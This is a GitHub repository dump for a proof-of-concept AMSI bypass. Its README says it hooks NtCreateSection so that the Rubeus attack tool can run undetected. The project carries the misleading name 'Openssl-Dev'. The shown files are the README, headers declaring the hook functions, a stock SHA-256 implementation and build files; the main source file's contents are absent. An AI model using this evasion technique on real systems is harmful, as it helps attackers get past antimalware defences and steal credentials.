├── Rubeus.zip
├── Openssl-Dev
    ├── Openssl-Dev.rc
    ├── resource.h
    ├── definitions.h
    ├── defs.h
    ├── Openssl-Dev.vcxproj.filters
    ├── sha256.h
    ├── sha256.cpp
    ├── Openssl-Dev.vcxproj
    └── Source.cpp
├── README.md
├── CppProperties.json
├── Openssl-Dev.sln
├── .gitattributes
└── .gitignore


/Rubeus.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waawaa/AMSI_Rubeus_bypass/HEAD/Rubeus.zip


--------------------------------------------------------------------------------
/Openssl-Dev/Openssl-Dev.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waawaa/AMSI_Rubeus_bypass/HEAD/Openssl-Dev/Openssl-Dev.rc


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # AMSI_Rubeus_bypass
2 | 
3 | AMSI bypass hooking NtCreateSection
4 | <br/>POC for Rubeus execution.
5 | <br/>Execute Openssl-Dev.exe "commands" to execute Rubeus (file deletefile.txt has to be in the same path, or change the file in the code)
6 | 
7 | 


--------------------------------------------------------------------------------
/CppProperties.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "configurations": [
 3 |     {
 4 |       "inheritEnvironments": [
 5 |         "msvc_x64"
 6 |       ],
 7 |       "name": "x64-Release",
 8 |       "includePath": [
 9 |         "${env.INCLUDE}",
10 |         "${workspaceRoot}\\**"
11 |       ],
12 |       "defines": [
13 |         "WIN32",
14 |         "NDEBUG",
15 |         "UNICODE",
16 |         "_UNICODE"
17 |       ],
18 |       "intelliSenseMode": "windows-msvc-x64"
19 |     }
20 |   ]
21 | }


--------------------------------------------------------------------------------
/Openssl-Dev/resource.h:
--------------------------------------------------------------------------------
 1 | //{{NO_DEPENDENCIES}}
 2 | // Microsoft Visual C++ generated include file.
 3 | // Used by Openssl-Dev.rc
 4 | //
 5 | #define IDR_HTML1                       101
 6 | 
 7 | // Next default values for new objects
 8 | // 
 9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE        102
12 | #define _APS_NEXT_COMMAND_VALUE         40001
13 | #define _APS_NEXT_CONTROL_VALUE         1001
14 | #define _APS_NEXT_SYMED_VALUE           101
15 | #endif
16 | #endif
17 | 


--------------------------------------------------------------------------------
/Openssl-Dev/definitions.h:
--------------------------------------------------------------------------------
 1 | #define _CRT_SECURE_NO_WARNINGS
 2 | #include <Windows.h>
 3 | 
 4 | #include <stdio.h>
 5 | #include <string.h>
 6 | #include <Wincrypt.h>
 7 | #include <time.h>
 8 | #include <process.h>
 9 | #include <tchar.h>
10 | #include <psapi.h>
11 | #include <iostream>
12 | #include "sha256.h"
13 | 
14 | #pragma comment(lib, "advapi32.lib")
15 | #pragma comment(lib, "crypt32.lib")
16 | typedef struct _UNICODE_STRING {
17 | 	USHORT Length;
18 | 	USHORT MaximumLength;
19 | 	PWSTR  Buffer;
20 | } UNICODE_STRING;
21 | typedef UNICODE_STRING* PUNICODE_STRING;
22 | typedef const UNICODE_STRING* PCUNICODE_STRING;
23 | 
24 | typedef struct _OBJECT_ATTRIBUTES {
25 | 	ULONG Length;
26 | 	HANDLE RootDirectory;
27 | 	PUNICODE_STRING ObjectName;
28 | 	ULONG Attributes;
29 | 	PVOID SecurityDescriptor;
30 | 	PVOID SecurityQualityOfService;
31 | } OBJECT_ATTRIBUTES;
32 | typedef OBJECT_ATTRIBUTES* POBJECT_ATTRIBUTES;


--------------------------------------------------------------------------------
/Openssl-Dev/defs.h:
--------------------------------------------------------------------------------
 1 | #define _CRT_SECURE_NO_WARNINGS
 2 | #include <Windows.h>
 3 | 
 4 | #include <stdio.h>
 5 | #include <string.h>
 6 | #include <Wincrypt.h>
 7 | #include <time.h>
 8 | #include <process.h>
 9 | #include <tchar.h>
10 | #include <psapi.h>
11 | #include <winternl.h>
12 | #include <iostream>
13 | #include "sha256.h"
14 | 
15 | #pragma comment(lib, "advapi32.lib")
16 | #pragma comment(lib, "crypt32.lib")
17 | 
18 | 
19 | 
20 | #ifndef NT_SUCCESS
21 | #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
22 | #endif
23 | 
24 | 
25 | 
26 | #define AES_KEY_SIZE 16
27 | #define CHUNK_SIZE (AES_KEY_SIZE*5)
28 | 
29 | 
30 | #define extension ".inf"
31 | 
32 | 
33 | 
34 | typedef __kernel_entry NTSYSCALLAPI NTSTATUS (WINAPI *myNtCreateSection)(
35 | 	PHANDLE            SectionHandle,
36 | 	ACCESS_MASK        DesiredAccess,
37 | 	POBJECT_ATTRIBUTES ObjectAttributes,
38 | 	PLARGE_INTEGER     MaximumSize,
39 | 	ULONG              SectionPageProtection,
40 | 	ULONG              AllocationAttributes,
41 | 	HANDLE             FileHandle
42 | ); //define NtCreateSection
43 | 
44 | BOOL hook_ntcreatesection(HANDLE hProc); //define hook_ntcreatesection
45 | BOOL restore_hook_ntcreatesection(OUT PHANDLE SectionHandle, IN ULONG DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG PageAttributess, IN ULONG SectionAttributes, IN HANDLE FileHandle OPTIONAL);
46 | 
47 | 


--------------------------------------------------------------------------------
/Openssl-Dev.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.29519.87
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Openssl-Dev", "Openssl-Dev\Openssl-Dev.vcxproj", "{CAD458F3-22A8-4679-AB61-2569DA5FF6EF}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{CAD458F3-22A8-4679-AB61-2569DA5FF6EF}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{CAD458F3-22A8-4679-AB61-2569DA5FF6EF}.Debug|x64.Build.0 = Debug|x64
18 | 		{CAD458F3-22A8-4679-AB61-2569DA5FF6EF}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{CAD458F3-22A8-4679-AB61-2569DA5FF6EF}.Debug|x86.Build.0 = Debug|Win32
20 | 		{CAD458F3-22A8-4679-AB61-2569DA5FF6EF}.Release|x64.ActiveCfg = Release|x64
21 | 		{CAD458F3-22A8-4679-AB61-2569DA5FF6EF}.Release|x64.Build.0 = Release|x64
22 | 		{CAD458F3-22A8-4679-AB61-2569DA5FF6EF}.Release|x86.ActiveCfg = Release|Win32
23 | 		{CAD458F3-22A8-4679-AB61-2569DA5FF6EF}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {243E9A30-A216-4FCF-8C4E-6B55B329AC50}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/Openssl-Dev/Openssl-Dev.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Archivos de origen">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Archivos de encabezado">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Archivos de recursos">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="Source.cpp">
19 |       <Filter>Archivos de origen</Filter>
20 |     </ClCompile>
21 |     <ClCompile Include="sha256.cpp">
22 |       <Filter>Archivos de origen</Filter>
23 |     </ClCompile>
24 |   </ItemGroup>
25 |   <ItemGroup>
26 |     <ClInclude Include="resource.h">
27 |       <Filter>Archivos de encabezado</Filter>
28 |     </ClInclude>
29 |     <ClInclude Include="sha256.h">
30 |       <Filter>Archivos de encabezado</Filter>
31 |     </ClInclude>
32 |     <ClInclude Include="defs.h">
33 |       <Filter>Archivos de encabezado</Filter>
34 |     </ClInclude>
35 |   </ItemGroup>
36 |   <ItemGroup>
37 |     <ResourceCompile Include="Openssl-Dev.rc">
38 |       <Filter>Archivos de recursos</Filter>
39 |     </ResourceCompile>
40 |   </ItemGroup>
41 | </Project>


--------------------------------------------------------------------------------
/Openssl-Dev/sha256.h:
--------------------------------------------------------------------------------
 1 | #ifndef SHA256_H
 2 | #define SHA256_H
 3 | #include <string>
 4 | 
 5 | class SHA256
 6 | {
 7 | protected:
 8 |     typedef unsigned char uint8;
 9 |     typedef unsigned int uint32;
10 |     typedef unsigned long long uint64;
11 | 
12 |     const static uint32 sha256_k[];
13 |     static const unsigned int SHA224_256_BLOCK_SIZE = (512 / 8);
14 | public:
15 |     void init();
16 |     void update(const unsigned char* message, unsigned int len);
17 |     void final(unsigned char* digest);
18 |     static const unsigned int DIGEST_SIZE = (256 / 8);
19 | 
20 | protected:
21 |     void transform(const unsigned char* message, unsigned int block_nb);
22 |     unsigned int m_tot_len;
23 |     unsigned int m_len;
24 |     unsigned char m_block[2 * SHA224_256_BLOCK_SIZE];
25 |     uint32 m_h[8];
26 | };
27 | 
28 | std::string sha256(std::string input);
29 | 
30 | #define SHA2_SHFR(x, n)    (x >> n)
31 | #define SHA2_ROTR(x, n)   ((x >> n) | (x << ((sizeof(x) << 3) - n)))
32 | #define SHA2_ROTL(x, n)   ((x << n) | (x >> ((sizeof(x) << 3) - n)))
33 | #define SHA2_CH(x, y, z)  ((x & y) ^ (~x & z))
34 | #define SHA2_MAJ(x, y, z) ((x & y) ^ (x & z) ^ (y & z))
35 | #define SHA256_F1(x) (SHA2_ROTR(x,  2) ^ SHA2_ROTR(x, 13) ^ SHA2_ROTR(x, 22))
36 | #define SHA256_F2(x) (SHA2_ROTR(x,  6) ^ SHA2_ROTR(x, 11) ^ SHA2_ROTR(x, 25))
37 | #define SHA256_F3(x) (SHA2_ROTR(x,  7) ^ SHA2_ROTR(x, 18) ^ SHA2_SHFR(x,  3))
38 | #define SHA256_F4(x) (SHA2_ROTR(x, 17) ^ SHA2_ROTR(x, 19) ^ SHA2_SHFR(x, 10))
39 | #define SHA2_UNPACK32(x, str)                 \
40 | {                                             \
41 |     *((str) + 3) = (uint8) ((x)      );       \
42 |     *((str) + 2) = (uint8) ((x) >>  8);       \
43 |     *((str) + 1) = (uint8) ((x) >> 16);       \
44 |     *((str) + 0) = (uint8) ((x) >> 24);       \
45 | }
46 | #define SHA2_PACK32(str, x)                   \
47 | {                                             \
48 |     *(x) =   ((uint32) *((str) + 3)      )    \
49 |            | ((uint32) *((str) + 2) <<  8)    \
50 |            | ((uint32) *((str) + 1) << 16)    \
51 |            | ((uint32) *((str) + 0) << 24);   \
52 | }
53 | #endif
54 | 


--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
 1 | ###############################################################################
 2 | # Set default behavior to automatically normalize line endings.
 3 | ###############################################################################
 4 | * text=auto
 5 | 
 6 | ###############################################################################
 7 | # Set default behavior for command prompt diff.
 8 | #
 9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs     diff=csharp
14 | 
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following 
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln       merge=binary
26 | #*.csproj    merge=binary
27 | #*.vbproj    merge=binary
28 | #*.vcxproj   merge=binary
29 | #*.vcproj    merge=binary
30 | #*.dbproj    merge=binary
31 | #*.fsproj    merge=binary
32 | #*.lsproj    merge=binary
33 | #*.wixproj   merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj   merge=binary
36 | #*.wwaproj   merge=binary
37 | 
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg   binary
44 | #*.png   binary
45 | #*.gif   binary
46 | 
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | # 
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the 
52 | # entries below.
53 | ###############################################################################
54 | #*.doc   diff=astextplain
55 | #*.DOC   diff=astextplain
56 | #*.docx  diff=astextplain
57 | #*.DOCX  diff=astextplain
58 | #*.dot   diff=astextplain
59 | #*.DOT   diff=astextplain
60 | #*.pdf   diff=astextplain
61 | #*.PDF   diff=astextplain
62 | #*.rtf   diff=astextplain
63 | #*.RTF   diff=astextplain
64 | 


--------------------------------------------------------------------------------
/Openssl-Dev/sha256.cpp:
--------------------------------------------------------------------------------
  1 | #define _CRT_SECURE_NO_WARNINGS
  2 | #include <cstring>
  3 | #include <fstream>
  4 | #include "sha256.h"
  5 | 
  6 | const unsigned int SHA256::sha256_k[64] = //UL = uint32
  7 | { 0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5,
  8 |  0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5,
  9 |  0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3,
 10 |  0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174,
 11 |  0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc,
 12 |  0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da,
 13 |  0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7,
 14 |  0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967,
 15 |  0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13,
 16 |  0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85,
 17 |  0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3,
 18 |  0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070,
 19 |  0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5,
 20 |  0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3,
 21 |  0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208,
 22 |  0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2 };
 23 | 
 24 | void SHA256::transform(const unsigned char* message, unsigned int block_nb)
 25 | {
 26 |     uint32 w[64];
 27 |     uint32 wv[8];
 28 |     uint32 t1, t2;
 29 |     const unsigned char* sub_block;
 30 |     int i;
 31 |     int j;
 32 |     for (i = 0; i < (int)block_nb; i++) {
 33 |         sub_block = message + (i << 6);
 34 |         for (j = 0; j < 16; j++) {
 35 |             SHA2_PACK32(&sub_block[j << 2], &w[j]);
 36 |         }
 37 |         for (j = 16; j < 64; j++) {
 38 |             w[j] = SHA256_F4(w[j - 2]) + w[j - 7] + SHA256_F3(w[j - 15]) + w[j - 16];
 39 |         }
 40 |         for (j = 0; j < 8; j++) {
 41 |             wv[j] = m_h[j];
 42 |         }
 43 |         for (j = 0; j < 64; j++) {
 44 |             t1 = wv[7] + SHA256_F2(wv[4]) + SHA2_CH(wv[4], wv[5], wv[6])
 45 |                 + sha256_k[j] + w[j];
 46 |             t2 = SHA256_F1(wv[0]) + SHA2_MAJ(wv[0], wv[1], wv[2]);
 47 |             wv[7] = wv[6];
 48 |             wv[6] = wv[5];
 49 |             wv[5] = wv[4];
 50 |             wv[4] = wv[3] + t1;
 51 |             wv[3] = wv[2];
 52 |             wv[2] = wv[1];
 53 |             wv[1] = wv[0];
 54 |             wv[0] = t1 + t2;
 55 |         }
 56 |         for (j = 0; j < 8; j++) {
 57 |             m_h[j] += wv[j];
 58 |         }
 59 |     }
 60 | }
 61 | 
 62 | void SHA256::init()
 63 | {
 64 |     m_h[0] = 0x6a09e667;
 65 |     m_h[1] = 0xbb67ae85;
 66 |     m_h[2] = 0x3c6ef372;
 67 |     m_h[3] = 0xa54ff53a;
 68 |     m_h[4] = 0x510e527f;
 69 |     m_h[5] = 0x9b05688c;
 70 |     m_h[6] = 0x1f83d9ab;
 71 |     m_h[7] = 0x5be0cd19;
 72 |     m_len = 0;
 73 |     m_tot_len = 0;
 74 | }
 75 | 
 76 | void SHA256::update(const unsigned char* message, unsigned int len)
 77 | {
 78 |     unsigned int block_nb;
 79 |     unsigned int new_len, rem_len, tmp_len;
 80 |     const unsigned char* shifted_message;
 81 |     tmp_len = SHA224_256_BLOCK_SIZE - m_len;
 82 |     rem_len = len < tmp_len ? len : tmp_len;
 83 |     memcpy(&m_block[m_len], message, rem_len);
 84 |     if (m_len + len < SHA224_256_BLOCK_SIZE) {
 85 |         m_len += len;
 86 |         return;
 87 |     }
 88 |     new_len = len - rem_len;
 89 |     block_nb = new_len / SHA224_256_BLOCK_SIZE;
 90 |     shifted_message = message + rem_len;
 91 |     transform(m_block, 1);
 92 |     transform(shifted_message, block_nb);
 93 |     rem_len = new_len % SHA224_256_BLOCK_SIZE;
 94 |     memcpy(m_block, &shifted_message[block_nb << 6], rem_len);
 95 |     m_len = rem_len;
 96 |     m_tot_len += (block_nb + 1) << 6;
 97 | }
 98 | 
 99 | void SHA256::final(unsigned char* digest)
100 | {
101 |     unsigned int block_nb;
102 |     unsigned int pm_len;
103 |     unsigned int len_b;
104 |     int i;
105 |     block_nb = (1 + ((SHA224_256_BLOCK_SIZE - 9)
106 |         < (m_len % SHA224_256_BLOCK_SIZE)));
107 |     len_b = (m_tot_len + m_len) << 3;
108 |     pm_len = block_nb << 6;
109 |     memset(m_block + m_len, 0, pm_len - m_len);
110 |     m_block[m_len] = 0x80;
111 |     SHA2_UNPACK32(len_b, m_block + pm_len - 4);
112 |     transform(m_block, block_nb);
113 |     for (i = 0; i < 8; i++) {
114 |         SHA2_UNPACK32(m_h[i], &digest[i << 2]);
115 |     }
116 | }
117 | 
118 | std::string sha256(std::string input)
119 | {
120 |     unsigned char digest[SHA256::DIGEST_SIZE];
121 |     memset(digest, 0, SHA256::DIGEST_SIZE);
122 | 
123 |     SHA256 ctx = SHA256();
124 |     ctx.init();
125 |     ctx.update((unsigned char*)input.c_str(), input.length());
126 |     ctx.final(digest);
127 | 
128 |     char buf[2 * SHA256::DIGEST_SIZE + 1];
129 |     buf[2 * SHA256::DIGEST_SIZE] = 0;
130 |     for (int i = 0; i < SHA256::DIGEST_SIZE; i++)
131 |         sprintf(buf + i * 2, "%02x", digest[i]);
132 |     return std::string(buf);
133 | }
134 | 


--------------------------------------------------------------------------------
/Openssl-Dev/Openssl-Dev.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <ProjectGuid>{CAD458F3-22A8-4679-AB61-2569DA5FF6EF}</ProjectGuid>
 24 |     <RootNamespace>OpensslDev</RootNamespace>
 25 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 26 |   </PropertyGroup>
 27 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 28 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 29 |     <ConfigurationType>Application</ConfigurationType>
 30 |     <UseDebugLibraries>true</UseDebugLibraries>
 31 |     <PlatformToolset>v142</PlatformToolset>
 32 |     <CharacterSet>MultiByte</CharacterSet>
 33 |     <SpectreMitigation>false</SpectreMitigation>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v142</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>MultiByte</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v142</PlatformToolset>
 46 |     <CharacterSet>MultiByte</CharacterSet>
 47 |     <SpectreMitigation>false</SpectreMitigation>
 48 |   </PropertyGroup>
 49 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 50 |     <ConfigurationType>Application</ConfigurationType>
 51 |     <UseDebugLibraries>false</UseDebugLibraries>
 52 |     <PlatformToolset>v142</PlatformToolset>
 53 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 54 |     <CharacterSet>MultiByte</CharacterSet>
 55 |   </PropertyGroup>
 56 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 57 |   <ImportGroup Label="ExtensionSettings">
 58 |   </ImportGroup>
 59 |   <ImportGroup Label="Shared">
 60 |   </ImportGroup>
 61 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 62 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 63 |   </ImportGroup>
 64 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 65 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 66 |   </ImportGroup>
 67 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 68 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 69 |   </ImportGroup>
 70 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 71 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 72 |   </ImportGroup>
 73 |   <PropertyGroup Label="UserMacros" />
 74 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 75 |     <IncludePath>C:\Program Files\OpenSSL-Win64\include;$(IncludePath)</IncludePath>
 76 |   </PropertyGroup>
 77 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 78 |     <ExecutablePath>C:\Program Files\OpenSSL-Win64\;$(ExecutablePath)</ExecutablePath>
 79 |     <IncludePath>C:\Program Files\OpenSSL-Win64\include;$(IncludePath)</IncludePath>
 80 |   </PropertyGroup>
 81 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 82 |     <ClCompile>
 83 |       <WarningLevel>Level3</WarningLevel>
 84 |       <Optimization>Disabled</Optimization>
 85 |       <SDLCheck>true</SDLCheck>
 86 |       <ConformanceMode>true</ConformanceMode>
 87 |     </ClCompile>
 88 |     <Link>
 89 |       <SubSystem>Console</SubSystem>
 90 |     </Link>
 91 |   </ItemDefinitionGroup>
 92 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 93 |     <ClCompile>
 94 |       <WarningLevel>Level3</WarningLevel>
 95 |       <Optimization>Disabled</Optimization>
 96 |       <SDLCheck>true</SDLCheck>
 97 |       <ConformanceMode>true</ConformanceMode>
 98 |       <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
 99 |     </ClCompile>
100 |     <Link>
101 |       <SubSystem>Console</SubSystem>
102 |     </Link>
103 |   </ItemDefinitionGroup>
104 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
105 |     <ClCompile>
106 |       <WarningLevel>Level3</WarningLevel>
107 |       <Optimization>MaxSpeed</Optimization>
108 |       <FunctionLevelLinking>true</FunctionLevelLinking>
109 |       <IntrinsicFunctions>true</IntrinsicFunctions>
110 |       <SDLCheck>true</SDLCheck>
111 |       <ConformanceMode>true</ConformanceMode>
112 |       <MultiProcessorCompilation>true</MultiProcessorCompilation>
113 |     </ClCompile>
114 |     <Link>
115 |       <SubSystem>Console</SubSystem>
116 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
117 |       <OptimizeReferences>true</OptimizeReferences>
118 |     </Link>
119 |   </ItemDefinitionGroup>
120 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
121 |     <ClCompile>
122 |       <WarningLevel>Level3</WarningLevel>
123 |       <Optimization>MaxSpeed</Optimization>
124 |       <FunctionLevelLinking>true</FunctionLevelLinking>
125 |       <IntrinsicFunctions>true</IntrinsicFunctions>
126 |       <SDLCheck>true</SDLCheck>
127 |       <ConformanceMode>true</ConformanceMode>
128 |       <MultiProcessorCompilation>false</MultiProcessorCompilation>
129 |       <AdditionalOptions>/MT %(AdditionalOptions)</AdditionalOptions>
130 |     </ClCompile>
131 |     <Link>
132 |       <SubSystem>Console</SubSystem>
133 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
134 |       <OptimizeReferences>true</OptimizeReferences>
135 |       <GenerateDebugInformation>false</GenerateDebugInformation>
136 |     </Link>
137 |   </ItemDefinitionGroup>
138 |   <ItemGroup>
139 |     <ClCompile Include="sha256.cpp" />
140 |     <ClCompile Include="Source.cpp" />
141 |   </ItemGroup>
142 |   <ItemGroup>
143 |     <ClInclude Include="defs.h" />
144 |     <ClInclude Include="resource.h" />
145 |     <ClInclude Include="sha256.h" />
146 |   </ItemGroup>
147 |   <ItemGroup>
148 |     <ResourceCompile Include="Openssl-Dev.rc" />
149 |   </ItemGroup>
150 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
151 |   <ImportGroup Label="ExtensionTargets">
152 |   </ImportGroup>
153 | </Project>


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
  1 | ## Ignore Visual Studio temporary files, build results, and
  2 | ## files generated by popular Visual Studio add-ons.
  3 | ##
  4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
  5 | 
  6 | # User-specific files
  7 | *.rsuser
  8 | *.suo
  9 | *.user
 10 | *.userosscache
 11 | *.sln.docstates
 12 | 
 13 | # User-specific files (MonoDevelop/Xamarin Studio)
 14 | *.userprefs
 15 | 
 16 | # Mono auto generated files
 17 | mono_crash.*
 18 | 
 19 | # Build results
 20 | [Dd]ebug/
 21 | [Dd]ebugPublic/
 22 | [Rr]elease/
 23 | [Rr]eleases/
 24 | x64/
 25 | x86/
 26 | [Ww][Ii][Nn]32/
 27 | [Aa][Rr][Mm]/
 28 | [Aa][Rr][Mm]64/
 29 | bld/
 30 | [Bb]in/
 31 | [Oo]bj/
 32 | [Oo]ut/
 33 | [Ll]og/
 34 | [Ll]ogs/
 35 | 
 36 | # Visual Studio 2015/2017 cache/options directory
 37 | .vs/
 38 | # Uncomment if you have tasks that create the project's static files in wwwroot
 39 | #wwwroot/
 40 | 
 41 | # Visual Studio 2017 auto generated files
 42 | Generated\ Files/
 43 | 
 44 | # MSTest test Results
 45 | [Tt]est[Rr]esult*/
 46 | [Bb]uild[Ll]og.*
 47 | 
 48 | # NUnit
 49 | *.VisualState.xml
 50 | TestResult.xml
 51 | nunit-*.xml
 52 | 
 53 | # Build Results of an ATL Project
 54 | [Dd]ebugPS/
 55 | [Rr]eleasePS/
 56 | dlldata.c
 57 | 
